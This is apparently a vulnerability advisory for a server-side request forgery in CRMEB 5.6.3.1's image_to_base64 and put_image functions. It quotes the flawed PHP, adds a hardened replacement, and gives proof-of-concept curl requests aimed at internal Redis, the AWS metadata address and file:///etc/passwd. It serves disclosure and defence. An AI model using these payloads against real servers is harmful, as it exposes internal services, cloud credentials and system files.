CRMEB 5.6.3.1 Server-Side Request Forgery (SSRF) Vulnerability #2
Description
Supplier
https://github.com/crmeb/crmeb
Vulnerability File
app/common.php
Vulnerability Type
Server-Side Request Forgery (CWE-918)
Severity
High
Describe
Code analysis
In the app/common.php file, the image_to_base64 and put_image functions accept user-controlled URL parameters and make HTTP requests without validation, allowing Server-Side Request Forgery.
```php
// Line 508-549 - image_to_base64 function
function image_to_base64($avatar = '', $timeout = 9)
{
    // No URL validation
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $avatar);            // User-controlled URL
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);    // Follows redirects
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    // ...
    $imgData = curl_exec($curl);
    curl_close($curl);
    return "data:image/jpeg;base64," . base64_encode($imgData);
}

// Line 558-587 - put_image function
function put_image($url, $filename = '')
{
    // No URL validation
    $imgData = file_get_contents($url); // User-controlled URL
    // ...
}
```

The functions do not validate:
- Protocol type (file://, gopher://, dict://, etc.)
- Target IP address (internal IPs, localhost, cloud metadata)
- Port numbers
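A hardened replacement for image_to_base64 with the missing checks, added here as an example and not code from CRMEB (the helper names are hypothetical): it allows only http/https, rejects URLs carrying credentials, resolves the host once, refuses private, loopback and link-local addresses (169.254.0.0/16 covers the cloud metadata endpoint), pins the resolved IP for curl so a DNS rebinding cannot swap the target, disables redirects, and only turns an image/* response into a data URI.

```php
<?php
// Added hardening example, not CRMEB's own code. Helper names are hypothetical.
// Only http/https to a public, resolved IPv4 address is fetched; redirects are not followed.

function resolve_public_target(string $url): ?array
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host']) || isset($p['user']) || isset($p['pass'])) {
        return null;
    }
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null; // rejects file://, gopher://, dict:// and similar schemes
    }
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    // Resolve once and pin the answer for curl, so a DNS rebinding cannot swap the target.
    // gethostbyname returns its input unchanged on failure (and for IPv4 literals).
    $ip = gethostbyname($p['host']);
    // FILTER_FLAG_NO_PRIV_RANGE: 10/8, 172.16/12, 192.168/16;
    // FILTER_FLAG_NO_RES_RANGE: 0/8, 127/8, 169.254/16 (cloud metadata), 240/4.
    $ok = filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);
    return $ok === false ? null : ['host' => $p['host'], 'port' => $port, 'ip' => $ip];
}

function image_to_base64_safe(string $avatar, int $timeout = 9): ?string
{
    $t = resolve_public_target($avatar);
    if ($t === null) {
        return null; // refuse rather than fetch
    }
    $curl = curl_init();
    curl_setopt_array($curl, [
        CURLOPT_URL            => $avatar,
        CURLOPT_RESOLVE        => ["{$t['host']}:{$t['port']}:{$t['ip']}"],
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION => false, // a 302 to 127.0.0.1 must not be followed
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT        => $timeout,
    ]);
    $imgData = curl_exec($curl);
    $status  = curl_getinfo($curl, CURLINFO_RESPONSE_CODE);
    $type    = (string) curl_getinfo($curl, CURLINFO_CONTENT_TYPE);
    curl_close($curl);
    if ($imgData === false || $status !== 200 || strncmp($type, 'image/', 6) !== 0) {
        return null; // only image responses become data: URIs
    }
    return 'data:' . $type . ';base64,' . base64_encode($imgData);
}
```

Hosts that resolve only to IPv6 are rejected by this version because gethostbyname is IPv4-only; use dns_get_record with the same range checks on AAAA answers if IPv6 targets must be supported.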
POC

```http
POST /api/image_base64 HTTP/1.1
Host: target.com
Content-Type: application/json

{"image":"http://127.0.0.1:6379/"}
```

Test internal Redis:

```bash
curl -X POST "http://target.com/api/image_base64" \
  -H "Content-Type: application/json" \
  -d '{"image":"http://127.0.0.1:6379/"}'
```

Test cloud metadata (AWS):

```bash
curl -X POST "http://target.com/api/image_base64" \
  -H "Content-Type: application/json" \
  -d '{"image":"http://169.254.169.254/latest/meta-data/"}'
```

Test file protocol:

```bash
curl -X POST "http://target.com/api/image_base64" \
  -H "Content-Type: application/json" \
  -d '{"image":"file:///etc/passwd"}'
```

Result

SSRF confirmed. Can access internal services and cloud metadata endpoints.

```
[*] Internal Redis accessible
[*] Cloud metadata endpoint accessible
[*] Internal network scanning possible
```
Impact
An attacker can:
- Scan internal network infrastructure
- Access internal services (Redis, MySQL, etc.)
- Read cloud metadata (AWS, GCP, Azure)
- Access sensitive internal documents
- Potentially achieve remote code execution via Gopher protocol
Vendor Contact
References
- CWE-918: Server-Side Request Forgery (SSRF)
- https://cwe.mitre.org/data/definitions/918.html